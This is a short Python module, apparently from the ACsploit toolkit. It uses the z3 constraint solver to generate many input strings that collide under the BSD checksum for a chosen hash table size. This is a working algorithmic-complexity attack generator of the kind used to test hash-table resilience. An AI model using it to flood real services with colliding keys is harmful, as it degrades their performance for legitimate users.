import z3
from acsploit.options import Options
from .z3_common import get_collisions


options = Options()
options.add_option('n_collisions', 10, 'Number of colliding strings to create')
options.add_option('length', 10, 'Length of strings to create')
options.add_option('hash_table_size', 0xffff, 'Size of target hash table')
options.add_option('target_type', 'preimage', 'Whether the target is an image (hash output) or preimage (hash input)',
                   ['image', 'preimage'])
options.add_option('target', 'hello', 'Image or preimage of desired hash value')

DESCRIPTION = 'Produces hash collisions for the BSD checksum function.' \
              '\n\n  ' \
              'This exploit works by using z3 to "solve" for hash collisions. An implementation of the BSD ' \
              'checksum for z3 is used to generate a constraint system that z3 solves to find colliding hash inputs.'

NO_INPUT = True


def run(output):
    ret = get_collisions(z3bsd, options['target'], options['target_type'], options['length'],
                         options['n_collisions'], options['hash_table_size'])
    output.output(ret)


def z3bsd(bytes, hash_table_size):  # computes the bsd checksum in z3 format.
    checksum = 0
    for byte in bytes:
        checksum = (checksum >> 1) + ((checksum & 1) << 15)
        checksum += z3.ZeroExt(56, byte)
        checksum &= 0xffff
    return checksum % hash_table_size
